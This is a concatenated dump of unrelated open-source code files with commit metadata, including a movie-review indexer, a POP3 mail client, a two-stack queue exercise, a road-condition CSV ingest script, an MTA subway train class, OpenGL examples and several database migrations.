    cnt.update(tokens)

print("Found {} unique words in the vocabulary.".format(len(cnt)))

# Filter words below the frequency threshold. The comparison is strictly
# greater-than, matching the "frequency > N" message printed below.
if args.min_frequency > 0:
  filtered_words = [(w, c) for w, c in cnt.most_common() if c > args.min_frequency]
  cnt = collections.Counter(dict(filtered_words))
  print("Found {} unique words with frequency > {}.".format(len(cnt), args.min_frequency))

# Sort words by 1. frequency 2. lexically to break ties
word_with_counts = cnt.most_common()
word_with_counts = sorted(word_with_counts, key=lambda x: (x[1], x[0]), reverse=True)

# Take only max-vocab
if args.max_vocab_size is not None:
  word_with_counts = word_with_counts[:args.max_vocab_size]

with open(args.output_file, "w") as f:
  for word, count in word_with_counts:
    f.write("{}\n".format(word))
print("Wrote vocab of size {}: {}".format(len(word_with_counts), args.output_file))
| apache-2.0 | Python | |
21eac65d8a252e9d3cc83d97a9f270ef0078be9c | add indexer | gavin09/peen_movie,gavin09/peen_movie,gavin09/peen_movie | indexer.py | indexer.py | # -*- coding: utf-8 -*-
import json
import os
import argparse
import sys
import re
class Indexer:
def __init__(self):
self.forward_index = dict()
def create_index(self, raw_data, keyword):
keyword_utf8 = keyword.decode('utf-8')
if not self.forward_index.has_key(keyword_utf8):
self.forward_index[keyword_utf8] = dict()
self.forward_index[keyword_utf8]['positive'] = list()
self.forward_index[keyword_utf8]['negative'] = list()
self.forward_index[keyword_utf8]['others'] = list()
for data in raw_data:
if keyword_utf8 in data[1]:
if '好雷'.decode('utf-8') in data[1]:
self.forward_index[keyword_utf8]['positive'].append((data[0], data[1]))
elif '負雷'.decode('utf-8') in data[1]:
self.forward_index[keyword_utf8]['negative'].append((data[0], data[1]))
else:
self.forward_index[keyword_utf8]['others'].append((data[0], data[1]))
def load_data_from_file(self, dirname, filename):
if os.path.exists(os.path.join(dirname, filename)):
with open(os.path.join(dirname, filename), 'r') as readfile:
self.raw_data = json.load(readfile)
def get_index(self, keyword, search_type):
keyword_utf8 = keyword.decode('utf-8')
if self.forward_index.has_key(keyword_utf8):
if search_type in ('positive', 'negative', 'others'):
for result in self.forward_index[keyword_utf8][search_type]:
print "Title {}, Link {}".format(result[1].encode('utf-8'), result[0].encode('utf-8'))
else:
return None
if __name__ == '__main__':
arguments = argparse.ArgumentParser()
arguments.add_argument('--dirname', help='directory name')
arguments.add_argument('--filename', help='filename')
arguments.add_argument('--keyword', help='keyword to create index')
args = arguments.parse_args()
indexer = Indexer()
if os.path.exists(os.path.join(args.dirname, args.filename)):
with open(os.path.join(args.dirname, args.filename), 'r') as readfile:
data = json.load(readfile)
indexer.create_index(data, args.keyword)
else:
sys.exit()
| apache-2.0 | Python | |
37e87ad6eed85e83a2199f851e8b07135d779909 | Add wsgi script | fmarco76/DiscourseSSO,fmarco76/DiscourseSSO | DiscourseSSO.wsgi | DiscourseSSO.wsgi | # Copyright 2015 INFN
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
WSGI script to run the application.
Configure the environment variable DISCOURSE_SSO_CONFIG in order to read the
configuration file with the variables:
- DISCOURSE_URL: Discourse URL to send the user back
- DISCOURSE_SECRET_KEY: Secret key shared with the Discourse server
- DISCOURSE_USER_MAP: Attribute to read from the environment after user
validation
- All Flask configuration values
To run in a virtual environment add the activation code. Es.:
activate_this = '/path/to/env/bin/activate_this.py'
execfile(activate_this, dict(__file__=activate_this))
"""
from sso import app as application
| apache-2.0 | Python | |
261b2879c830aeaa21351c34a78dc0b5262436c2 | Create 7kyu_simple_fun138_similarity.py | Orange9000/Codewars,Orange9000/Codewars | Solutions/7kyu/7kyu_simple_fun138_similarity.py | Solutions/7kyu/7kyu_simple_fun138_similarity.py | def similarity(a, b):
return len(set(a).intersection(set(b)))/len(set(a)|set(b))
| mit | Python | |
c5427bc00678e9f9122b8201b79af2ab454288f3 | Create popServer.py | GiladE/birde,GiladE/birde,GiladE/birde,GiladE/birde,GiladE/birde,GiladE/birde,GiladE/birde | popServer.py | popServer.py | __author__ = 'JontyHome'
import poplib
class popServer():
# host = ''
# username = ''
# password = ''
# port = 0
def __init__(self, username, password, host, port):
self.host = host
self.username = username
self.password = password
self.port = port
self.mailbox = poplib.POP3_SSL(self.host,self.port)
self.mailbox.user(self.username)
self.mailbox.pass_(self.password)
self.mailbox.set_debuglevel(1)
def close_server(self):
self.mailbox.quit()
def get_status(self):
serverstatus = self.mailbox.stat()
return serverstatus
def get_messages(self):
return self.mailbox.list()
def display_message(self,index):
(server_msg, body, octets) = self.mailbox.retr(index)
self.debug(200, "Server Message: " , server_msg)
self.debug(200, "Number of Octets: " , octets)
self.debug(200, "Message body:")
for line in body:
print line
| mit | Python | |
eaf59371ea4ec9d5ceb98331c1a4b58a54558d3b | Solve Ch3_Q5 - Implement queue using two stacks | roommen/CtCI | fourth_edition/ch3_stacks_and_queues/python/3.5.py | fourth_edition/ch3_stacks_and_queues/python/3.5.py | '''
Implement a MyQueue class which implements a queue using two stacks.
'''
# Two-stack queue: stack1 is the "inbox" new values land on, stack2 the
# "outbox" values are served from (newest inbox element ends up at the
# bottom of the outbox after a transfer).
stack1 = list()
stack2 = list()
# Capacity of the inbox before a transfer is attempted.
max_ = 10


def push(val):
    """Append val to the inbox, spilling the inbox into the outbox when full.

    NOTE(review): when the inbox is full AND the outbox still holds items,
    "Queue Full!" is returned and val is silently dropped -- the demo caller
    (queue) ignores the return value, so such values vanish.
    """
    global stack1, stack2
    if len(stack1) == max_:
        if len(stack2) == 0:
            # Move inbox to outbox reversed so the oldest item is on top.
            for x in stack1[::-1]:
                stack2.append(x)
            stack1 = []
        else:
            return "Queue Full!"
    stack1.append(val)
def pop():
    """Remove and return the oldest queued value (FIFO order).

    When the outbox (stack2) is empty, the inbox (stack1) is drained into it
    first.  BUG FIX: that transfer must reverse the inbox so the oldest
    element ends up on top of the outbox; the old code copied it as-is,
    which made every refill performed here serve elements in LIFO order
    (push()'s own transfer already reverses -- this now matches it).

    Returns the string "Queue Empty" when both stacks are empty.
    """
    global stack1, stack2
    if len(stack2) == 0:
        if len(stack1) > 0:
            # Reverse so stack2.pop(-1) yields the oldest element first.
            stack2 = stack1[::-1]
            stack1 = []
        else:
            return "Queue Empty"
    return stack2.pop(-1)
def queue(val):
    """Enqueue val (thin wrapper over push; its return value is ignored)."""
    # Call the push
    global stack1, stack2
    push(val)
    # print(stack1, stack2)


def dequeue():
    """Dequeue and return the oldest value (thin wrapper over pop)."""
    # Call the pop
    global stack1, stack2
    pop_out = pop()
    # print(stack1, stack2)
    return pop_out
# Demo driver: enqueue 13 values (3 beyond the inbox capacity of 10),
# drain 11, then interleave further queue/dequeue calls.
queue(10)
queue(20)
queue(30)
queue(40)
queue(50)
queue(60)
queue(70)
queue(80)
queue(90)
queue(100)
queue(110)
queue(120)
queue(130)
print(dequeue())
print(dequeue())
print(dequeue())
print(dequeue())
print(dequeue())
print(dequeue())
print(dequeue())
print(dequeue())
print(dequeue())
print(dequeue())
print(dequeue())
queue(140)
print(dequeue())
print(dequeue())
print(dequeue())
print(dequeue())
queue(150)
| mit | Python | |
39668777b1f5579b37746521ba95b506bea08d1a | Prepare v1.2.295.dev | qk4l/Flexget,ibrahimkarahan/Flexget,grrr2/Flexget,jawilson/Flexget,patsissons/Flexget,jawilson/Flexget,Danfocus/Flexget,vfrc2/Flexget,grrr2/Flexget,jawilson/Flexget,jacobmetrick/Flexget,LynxyssCZ/Flexget,antivirtel/Flexget,cvium/Flexget,dsemi/Flexget,tsnoam/Flexget,malkavi/Flexget,Flexget/Flexget,sean797/Flexget,vfrc2/Flexget,tsnoam/Flexget,JorisDeRieck/Flexget,tarzasai/Flexget,gazpachoking/Flexget,tobinjt/Flexget,malkavi/Flexget,spencerjanssen/Flexget,offbyone/Flexget,tobinjt/Flexget,Danfocus/Flexget,qvazzler/Flexget,jacobmetrick/Flexget,patsissons/Flexget,antivirtel/Flexget,ZefQ/Flexget,thalamus/Flexget,OmgOhnoes/Flexget,antivirtel/Flexget,drwyrm/Flexget,Flexget/Flexget,qvazzler/Flexget,jacobmetrick/Flexget,xfouloux/Flexget,dsemi/Flexget,cvium/Flexget,thalamus/Flexget,Flexget/Flexget,ZefQ/Flexget,poulpito/Flexget,drwyrm/Flexget,xfouloux/Flexget,tobinjt/Flexget,cvium/Flexget,LynxyssCZ/Flexget,tsnoam/Flexget,OmgOhnoes/Flexget,oxc/Flexget,grrr2/Flexget,ratoaq2/Flexget,vfrc2/Flexget,malkavi/Flexget,malkavi/Flexget,ianstalk/Flexget,oxc/Flexget,offbyone/Flexget,spencerjanssen/Flexget,thalamus/Flexget,qk4l/Flexget,Pretagonist/Flexget,qk4l/Flexget,oxc/Flexget,poulpito/Flexget,lildadou/Flexget,tobinjt/Flexget,sean797/Flexget,crawln45/Flexget,Pretagonist/Flexget,Flexget/Flexget,gazpachoking/Flexget,Danfocus/Flexget,patsissons/Flexget,tarzasai/Flexget,poulpito/Flexget,lildadou/Flexget,lildadou/Flexget,JorisDeRieck/Flexget,crawln45/Flexget,Danfocus/Flexget,qvazzler/Flexget,ratoaq2/Flexget,ianstalk/Flexget,OmgOhnoes/Flexget,crawln45/Flexget,tarzasai/Flexget,crawln45/Flexget,LynxyssCZ/Flexget,JorisDeRieck/Flexget,spencerjanssen/Flexget,JorisDeRieck/Flexget,drwyrm/Flexget,ZefQ/Flexget,ibrahimkarahan/Flexget,ibrahimkarahan/Flexget,xfouloux/Flexget,offbyone/Flexget,dsemi/Flexget,sean797/Flexget,Pretagonist/Flexget,ratoaq2/Flexget,ianstalk/Flexget,jawilson/Flexget,LynxyssCZ/Flexget | flexget/_version.py | 
flexget/_version.py | """
Current FlexGet version.
This is contained in a separate file so that it can be easily read by setup.py, and easily edited and committed by
release scripts in continuous integration. Should (almost) never be set manually.
The version should always be set to the <next release version>.dev
The jenkins release job will automatically strip the .dev for release,
and update the version again for continued development.
"""
__version__ = '1.2.295.dev'
| """
Current FlexGet version.
This is contained in a separate file so that it can be easily read by setup.py, and easily edited and committed by
release scripts in continuous integration. Should (almost) never be set manually.
The version should always be set to the <next release version>.dev
The jenkins release job will automatically strip the .dev for release,
and update the version again for continued development.
"""
__version__ = '1.2.294'
| mit | Python |
f3bbb887d76ec428c4926f94c119220cc8c63cf8 | add offline script to ingest IDOT archived road conditions | akrherz/iem,akrherz/iem,akrherz/iem,akrherz/iem,akrherz/iem | scripts/roads/idot_csv_ingest.py | scripts/roads/idot_csv_ingest.py | """Be able to merge a CSV file that IDOT provides"""
import pandas as pd
import psycopg2
import sys
import datetime
pgconn = psycopg2.connect(database='postgis', host='localhost', user='mesonet',
port=5555)
cursor = pgconn.cursor()
xref = {}
cursor.execute("""SELECT idot_id, segid from roads_base""")
for row in cursor:
xref[row[0]] = row[1]
ROADCOND = {
'dry pavement': 0,
'wet': 1,
'partially covered with frost': 3,
'partially covered with snow': 39,
'partially covered with ice': 27,
'partially covered with slush': 56,
'partially covered with mix': 15,
'completely covered with frost': 11,
'completely covered with snow': 47,
'completely covered with ice': 35,
'completely covered with slush': 64,
'completely covered with mixed': 23,
'travel not advised': 51,
'impassable': 86,
'partially covered with mixed snow ice or slush': 15,
'completely covered with mixed snow ice or slush': 23,
'icy bridges': 27,
'seasonal': 0,
'Seasonal': 0,
'seasonal roadway conditions': 0,
'impassable': 86,
}
df = pd.read_csv(sys.argv[1])
for i, row in df.iterrows():
segid = xref[int(row['SEGMENT_ID'])]
condcode = ROADCOND[row['HL_PAVEMENT_CONDITION']]
ts = datetime.datetime.strptime(str(row['CARS_MSG_UPDATE_DATE']),
'%Y%m%d%H%M%S')
cursor.execute("""INSERT into roads_2015_2016_log(segid, valid, cond_code,
raw) VALUES (%s, %s, %s, %s)""", (segid, ts, condcode,
row['HL_PAVEMENT_CONDITION']))
cursor.close()
pgconn.commit()
| mit | Python | |
8c17c087ee1674bccfd8d34d382eca508fdf7cd9 | Create train.py | simonbr73/nyc-subway-finder | train.py | train.py | import time
import calendar
class Train:
"""Creates a train object that represents one subway train we have data for. The methods
contained in this class interpret information we get from the MTA's feed, such as route number,
direction, arrival time, and upcoming stops.
"""
def __init__(self, trip_update, stops, position_in_list):
"""Initializes one train object with a 'trip_update' object from the MTA data, a
dictionary of all the stop IDs and names in the subway system, and the index of the
train in the master list of train objects.
"""
self.trip_update = trip_update
self.stops = stops
self.routeID = str(self.trip_update.trip.route_id)
# A minor quirk in the MTA's data is fixed here. S trains were listed as GS for some reason
if self.routeID == "GS":
self.routeID = "S"
self.index = position_in_list
def showInfo(self, stop_number):
"""Given the stop number (the nth stop on the train's remaining route) as an
argument, this method prints out a message containing the train's direction,
route number, station, and arrival time.
"""
if self.arrivalTime == '': # At origin terminals, there will only be a departure time listed
if self.getArrivalTime(stop_number) == '00':
print "There is a", self.getDirection(), self.routeID, "train departing from", self.getStop(stop_number), "now."
elif self.getArrivalTime(stop_number) == '01':
print "There is a", self.getDirection(), self.routeID, "train departing from", self.getStop(stop_number), "in 1 minute."
else:
print "There is a", self.getDirection(), self.routeID, "train departing from", self.getStop(stop_number), "in", int(self.getArrivalTime(stop_number)), "minutes."
elif self.getArrivalTime(stop_number) == '01':
print "There is a", self.getDirection(), self.routeID, "train arriving at", self.getStop(stop_number), "in 1 minute."
elif self.getArrivalTime(stop_number) == '00':
print "There is a", self.getDirection(), self.routeID, "train arriving at", self.getStop(stop_number), "now."
else:
print "There is a", self.getDirection(), self.routeID, "train arriving at", self.getStop(stop_number), "in", int(self.getArrivalTime(stop_number)), "minutes."
def getArrivalTime(self, stop_number):
"""This method, given a stop number, returns the number of minutes it will take
for the train to arrive at the specified station.
"""
# Get absolute POSIX time from MTA data
self.arrivalTime = str(self.trip_update.stop_time_update[stop_number].arrival)
departureTime = str(self.trip_update.stop_time_update[stop_number].departure)
if self.arrivalTime != '': # Some stops only have a departure time listed
unix_time = float(self.arrivalTime.strip('time: '))
else:
unix_time = int(departureTime.strip('time: '))
# Calculate difference, in POSIX time, between arrival time and current time
# There is a 60-second offset here to account for delays in data transmission
# that would otherwise produce negative differences (i.e. train arriving in
# -1 minutes)
difference = unix_time + 60 - calendar.timegm(time.gmtime())
# Convert POSIX difference to struct_time difference, then return minutes
utc_difference = time.gmtime(difference)
readable_difference = time.strftime("%M", utc_difference)
return readable_difference
def getAllStops(self):
"""Gets all upcoming stops for the train.
Returns a list of form [stop number, station name].
"""
all_stops = []
# Iterate through all the stop_time_update objects in trip_update
for i in range(len(self.trip_update.stop_time_update)):
stop = self.getStop(i)
if stop not in all_stops:
all_stops.append([i, stop])
return all_stops
def getStop(self, i):
"""Gets the nth stop for the train given the stop number as an argument.
"""
stopID = self.trip_update.stop_time_update[i].stop_id
stop = self.stops[stopID]
return stop
def getDirection(self):
"""Gets the direction of the train. Returns 'N' or 'S'.
"""
if 'N' in str(self.trip_update.trip.trip_id):
direction = 'northbound'
if 'S' in str(self.trip_update.trip.trip_id):
direction = 'southbound'
return direction
def getIndex(self):
"""Gets the position of the train in the master train list.
"""
return self.index
| mit | Python | |
c2d1344c518dcf7c4cd20786bfa7cf649b977ca5 | Create new package (#7378) | LLNL/spack,EmreAtes/spack,krafczyk/spack,LLNL/spack,iulian787/spack,iulian787/spack,tmerrick1/spack,krafczyk/spack,matthiasdiener/spack,tmerrick1/spack,EmreAtes/spack,iulian787/spack,LLNL/spack,matthiasdiener/spack,EmreAtes/spack,EmreAtes/spack,matthiasdiener/spack,matthiasdiener/spack,mfherbst/spack,tmerrick1/spack,tmerrick1/spack,tmerrick1/spack,iulian787/spack,krafczyk/spack,LLNL/spack,mfherbst/spack,mfherbst/spack,matthiasdiener/spack,krafczyk/spack,LLNL/spack,krafczyk/spack,mfherbst/spack,iulian787/spack,EmreAtes/spack,mfherbst/spack | var/spack/repos/builtin/packages/perl-file-slurper/package.py | var/spack/repos/builtin/packages/perl-file-slurper/package.py | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PerlFileSlurper(PerlPackage):
    """A simple, sane and efficient module to slurp a file"""

    homepage = "http://search.cpan.org/~leont/File-Slurper/lib/File/Slurper.pm"
    url = "http://search.cpan.org/CPAN/authors/id/L/LE/LEONT/File-Slurper-0.011.tar.gz"
    # (release version, md5 checksum of the release tarball)
    version('0.011', 'e0482d3d5a0522e39132ba54af9f1ce3')
| lgpl-2.1 | Python | |
766eff22b8632ae8548fe30e5b44bc8ca5de29b5 | Create near_ten.py | dvt32/cpp-journey,dvt32/cpp-journey,dvt32/cpp-journey,dvt32/cpp-journey,dvt32/cpp-journey,dvt32/cpp-journey,dvt32/cpp-journey,dvt32/cpp-journey,dvt32/cpp-journey,dvt32/cpp-journey,dvt32/cpp-journey,dvt32/cpp-journey | Python/CodingBat/near_ten.py | Python/CodingBat/near_ten.py | # http://codingbat.com/prob/p165321
def near_ten(num):
return (num % 10 <= 2) or (num % 10 >= 8)
| mit | Python | |
e143ef5663f1fed402c9c941bd8b18adbf72c02b | add calebasse.url_utils module | ZTH1970/alcide,ZTH1970/alcide,ZTH1970/alcide,ZTH1970/alcide,ZTH1970/alcide | calebasse/urls_utils.py | calebasse/urls_utils.py | from django.core.urlresolvers import RegexURLPattern, RegexURLResolver
class DecoratedURLPattern(RegexURLPattern):
def resolve(self, *args, **kwargs):
result = super(DecoratedURLPattern, self).resolve(*args, **kwargs)
if result:
result.func = self._decorate_with(result.func)
return result
class DecoratedRegexURLResolver(RegexURLResolver):
def resolve(self, *args, **kwargs):
result = super(DecoratedRegexURLResolver, self).resolve(*args, **kwargs)
if result:
result.func = self._decorate_with(result.func)
return result
def decorated_includes(func, includes, *args, **kwargs):
urlconf_module, app_name, namespace = includes
for item in urlconf_module:
if isinstance(item, RegexURLPattern):
item.__class__ = DecoratedURLPattern
item._decorate_with = func
elif isinstance(item, RegexURLResolver):
item.__class__ = DecoratedRegexURLResolver
item._decorate_with = func
return urlconf_module, app_name, namespace
| agpl-3.0 | Python | |
be0e28cfc4628491ba6a2c176cb5458279b94f8d | Create simple_fun_#270_evil_code_medal.py | Kunalpod/codewars,Kunalpod/codewars | simple_fun_#270_evil_code_medal.py | simple_fun_#270_evil_code_medal.py | #Kunal Gautam
#Codewars : @Kunalpod
#Problem name: Simple Fun #270: Evil Code Medal
#Problem level: 7 kyu
def get_sec(time):
    """Convert an [hh, mm, ss] triple (ints or numeric strings) to total seconds.

    BUG FIX: callers pass ``"hh:mm:ss".split(':')``, i.e. strings, so the old
    ``time[0]*3600 + time[1]*60 + time[2]`` performed string repetition and
    concatenation (building an ~11 KB string) instead of arithmetic; the
    subsequent ``<`` comparisons only worked by lexicographic accident for
    zero-padded inputs.  Converting each component to int makes the result a
    real second count and keeps all comparisons correct.
    """
    return int(time[0]) * 3600 + int(time[1]) * 60 + int(time[2])
def evil_code_medal(user_time, gold, silver, bronze):
    """Return the medal ("Gold"/"Silver"/"Bronze"/"None") earned by finishing
    in user_time, given the three medal cut-off times (all "hh:mm:ss")."""
    elapsed = get_sec(user_time.split(':'))
    cutoffs = (("Gold", gold), ("Silver", silver), ("Bronze", bronze))
    for medal, limit in cutoffs:
        if elapsed < get_sec(limit.split(':')):
            return medal
    return "None"
| mit | Python | |
48d0578f32505702d63adc3c580749c4eb18326d | Create most_common_characters.py | sookoor/PythonInterviewPrep | most_common_characters.py | most_common_characters.py | import operator
def most_common_characters(input_string, N):
count = {}
for char in inputString:
if char in count:
count[char] += 1
else:
count[char] = 1
sorted_freq = sorted(count.iteritems(), key=operator.itemgetter(1), reverse=True)
for i in range(min(N, len(sorted_freq))):
print sorted_freq[i][0]
def main():
    # Demo: print the ten most common characters of a sample string.
    most_common_characters("aaaaaaaaaaaaaaaaaaakkkkkkkkkkkkkkkkkkkddddddddddddhhhhhhhhhbbbbbbbeeeewqqqer", 10)


if __name__ == "__main__":
    main()
| mit | Python | |
c06de87c53a8e42660b885de9d14796cc928c687 | add pwgen | anokata/pythonPetProjects,anokata/pythonPetProjects,anokata/pythonPetProjects,anokata/pythonPetProjects | pwgen.py | pwgen.py | for a in range(10):
for b in range(10):
for c in range(10):
for d in range(10):
for e in range(10):
for f in range(10):
for g in range(10):
for h in range(10):
print("{}{}{}{}{}{}{}{}".format(a,b,c,d,e,f,g,h))
| mit | Python | |
e47094d2b499ee2667384328194cd8f35ce17022 | Add a forgotten file | holkasepsem/python-lessons | sinus_subpixel/sinus_subpixel.py | sinus_subpixel/sinus_subpixel.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import pygame
from pygame.locals import *
from subpixel_surface import *
from math import sin, cos
# Number of dots animated each frame.
DOTS = 100


def main():
    """Animate DOTS sub-pixel-positioned sprites along a Lissajous-style
    curve until the window is closed (QUIT event)."""
    pygame.init()
    screen = pygame.display.set_mode((640, 480))
    clock = pygame.time.Clock()
    dot = pygame.image.load("dot.png")
    # Pre-renders 8 horizontally shifted variants for sub-pixel blitting.
    dot_subpixel = SubPixelSurface(dot, x_level=8)
    t = 0.
    while True:
        for event in pygame.event.get():
            if event.type == QUIT:
                return
        # Advance animation time by the wall-clock frame duration (scaled).
        time_passed = clock.tick()
        t += time_passed / 3000.
        for n in range(DOTS):
            # Phase offset per dot; x/y trace nested-sine curves around (320, 220).
            a = float(n)/DOTS * sin((t)*.1234)*100
            x = sin((t+a)*sin(t/4)) * 200.*sin(t/5) + 320
            y = cos(((t*1.234)+a)*sin(t/8)) * 200.*sin(t/4) + 220
            screen.blit(dot_subpixel.at(x, y), (x, y))
        pygame.display.update()
if __name__ == "__main__":
main()
| mit | Python | |
a3d7561c3c8930a55f7496c817876e4cf6b187bd | Add migration I forgot | fedspendingtransparency/data-act-broker-backend,fedspendingtransparency/data-act-broker-backend | dataactcore/migrations/versions/cd1025ac9399_add_columns_to_AwardProcurement.py | dataactcore/migrations/versions/cd1025ac9399_add_columns_to_AwardProcurement.py | """add columns to AwardProcurement
Revision ID: cd1025ac9399
Revises: a767facf8ea8
Create Date: 2017-09-18 15:05:52.772251
"""
# revision identifiers, used by Alembic.
revision = 'cd1025ac9399'
down_revision = 'a767facf8ea8'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade(engine_name):
    """Dispatch to the engine-specific upgrade_<engine_name>() in this module."""
    globals()["upgrade_%s" % engine_name]()


def downgrade(engine_name):
    """Dispatch to the engine-specific downgrade_<engine_name>() in this module."""
    globals()["downgrade_%s" % engine_name]()


def upgrade_data_broker():
    """Add the two options-value columns to award_procurement."""
    ### commands auto generated by Alembic - please adjust! ###
    op.add_column('award_procurement', sa.Column('base_and_all_options_value', sa.Text(), nullable=True))
    op.add_column('award_procurement', sa.Column('base_exercised_options_val', sa.Text(), nullable=True))
    ### end Alembic commands ###


def downgrade_data_broker():
    """Drop the columns added by upgrade_data_broker (reverse order)."""
    ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('award_procurement', 'base_exercised_options_val')
    op.drop_column('award_procurement', 'base_and_all_options_value')
    ### end Alembic commands ###
| cc0-1.0 | Python | |
51cf34acc3566804948804f835961b2b281dfbd1 | add 07geometry_shader_blending | mackst/opengl-samples | OpenGL-Examples/07geometry_shader_blending.py | OpenGL-Examples/07geometry_shader_blending.py | # -*- coding: utf-8 -*-
# OpenGL example code - Geometry Shader and Blending
# Uses a geometry shader to expand points to billboard quads.
# The billboards are then blended while drawing to create a galaxy
# made of particles.
import ctypes
import numpy as np
from OpenGL.GL import *
from OpenGL.GL import shaders
from glfw import *
import glm
class Window(object):
    """GLFW window hosting the OpenGL example; loads shaders named after the
    window title from ./shaders/<title>.vert|.frag.

    NOTE(review): despite the file's "geometry shader" title, only vertex
    and fragment shaders are compiled -- the geometry stage appears to be
    missing; confirm against the original C++ example.
    """
    def __init__(self, width=640, height=480, title='GLFW opengl window'):
        self.width = width
        self.height = height
        self.title = title
        self.window = None
        # Shader file paths are derived from the title.
        self.__vertexShader = './shaders/%s.vert' % self.title
        self.__fragmentShader = './shaders/%s.frag' % self.title
        self.__shaderProgram = None
        self.__vao = None

    def shaderFromFile(self, shaderType, shaderFile):
        """read shader from file and compile it"""
        shaderSrc = ''
        with open(shaderFile) as sf:
            shaderSrc = sf.read()
        return shaders.compileShader(shaderSrc, shaderType)

    def initGL(self):
        """opengl initialization"""
        # load shaders
        vertexShader = self.shaderFromFile(GL_VERTEX_SHADER, self.__vertexShader)
        fragmentShader = self.shaderFromFile(GL_FRAGMENT_SHADER, self.__fragmentShader)
        self.__shaderProgram = shaders.compileProgram(vertexShader, fragmentShader)
        if not self.__shaderProgram:
            self.close()
        # generate and bind the vao
        self.__vao = glGenVertexArrays(1)
        glBindVertexArray(self.__vao)
        # generate and bind the buffer object
        vbo = glGenBuffers(1)
        glBindBuffer(GL_ARRAY_BUFFER, vbo)
        # data for a fullscreen quad
        # NOTE(review): the buffer holds a single placeholder float but the
        # attrib pointer below declares 3-float positions at a 24-byte
        # stride -- the real vertex data looks stripped; TODO confirm.
        vertexData = np.array([0,], dtype=np.float32)
        # fill with data
        glBufferData(GL_ARRAY_BUFFER, vertexData.nbytes, vertexData, GL_STATIC_DRAW)
        # set up generic attrib pointers
        glEnableVertexAttribArray(0)
        glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, 6 * 4, None)
        glBindVertexArray(0)
        # we are drawing 3d objects so we want depth testing
        glEnable(GL_DEPTH_TEST)

    def renderGL(self):
        """opengl render method"""
        # get the time in seconds
        t = glfwGetTime()
        # clear first
        glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
        # use the shader program
        glUseProgram(self.__shaderProgram)
        # calculate ViewProjection matrix
        projection = glm.perspective(90.0, 4.0 / 3.0, .1, 100.0)
        # translate the world/view position
        view = glm.translate(glm.mat4(1.0), glm.vec3(0.0, 0.0, -5.0))
        # make the camera rotate around the origin
        view = glm.rotate(view, 90.0 * t, glm.vec3(1.0, 1.0, 1.0))
        viewProjection = np.array(projection * view, dtype=np.float32)
        # set the uniform
        # NOTE(review): self.__vpLocation is never assigned anywhere in this
        # class (a glGetUniformLocation call is missing from initGL), so the
        # first frame raises AttributeError -- confirm and fix upstream.
        glUniformMatrix4fv(self.__vpLocation, 1, GL_FALSE, viewProjection)
        # bind the vao
        glBindVertexArray(self.__vao)
        # draw
        # NOTE(review): no element array buffer is ever created/bound, yet
        # 36 indices are drawn here -- also looks like stripped setup code.
        glDrawElements(GL_TRIANGLES, 6*6, GL_UNSIGNED_INT, None)
        glBindVertexArray(0)
        glUseProgram(0)

    def initWindow(self):
        """setup window options. etc, opengl version"""
        # select opengl version
        glfwWindowHint(GLFW_OPENGL_PROFILE, GLFW_OPENGL_CORE_PROFILE)
        glfwWindowHint(GLFW_CONTEXT_VERSION_MAJOR, 3)
        glfwWindowHint(GLFW_CONTEXT_VERSION_MINOR, 3)

    def show(self):
        """create the window and show it"""
        self.initWindow()
        self.window = glfwCreateWindow(self.width, self.height, self.title, 0, 0)
        if self.window == 0:
            glfwTerminate()
            raise Exception('failed to open window')
        glfwMakeContextCurrent(self.window)
        # initialize opengl
        self.initGL()
        while not glfwWindowShouldClose(self.window):
            glfwPollEvents()
            self.renderGL()
            # check for errors
            error = glGetError()
            if error != GL_NO_ERROR:
                raise Exception(error)
            # finally swap buffers
            glfwSwapBuffers(self.window)
        self.close()

    def close(self):
        """Destroy the window and shut down GLFW."""
        glfwDestroyWindow(self.window)
        glfwTerminate()
if __name__ == '__main__':
import os.path
if glfwInit() == GL_FALSE:
raise Exception('failed to init GLFW')
title = os.path.basename(__file__)
win = Window(title=title[:-3])
win.show()
| mit | Python | |
1728765f6a1858086030abb6a96c47bc8c336e6e | Add natural optimizer. | GPflow/GPflow | gpflow/training/natgrad_optimizer.py | gpflow/training/natgrad_optimizer.py | import tensorflow as tf
from . import optimizer
class NatGradOptimizer(optimizer.Optimizer):
    """Natural-gradient optimizer for variational parameters.

    :param gamma: step size of the natural-gradient update.

    NOTE(review): `self.optimizer`, `self.name`, `_gen_var_list`,
    `_gen_feed_dict`, `_initialize_optimizer` and `minimize_operation` are
    all assumed to come from the `optimizer.Optimizer` base class -- confirm.
    """

    def __init__(self, gamma):
        self._gamma = gamma

    @property
    def gamma(self):
        """Natural-gradient step size.

        BUG FIX: this used to ``return self.gamma``, which recursed into the
        property itself (RecursionError on first access); it now returns the
        backing field set in __init__.
        """
        return self._gamma

    def minimize(self, model, session=None, var_list=None, feed_dict=None,
                 maxiter=1000, initialize=False, anchor=True, **kwargs):
        """
        Minimizes objective function of the model.

        :param model: GPflow model with objective tensor.
        :param session: Session where optimization will be run.
        :param var_list: List of extra variables which should be trained during optimization.
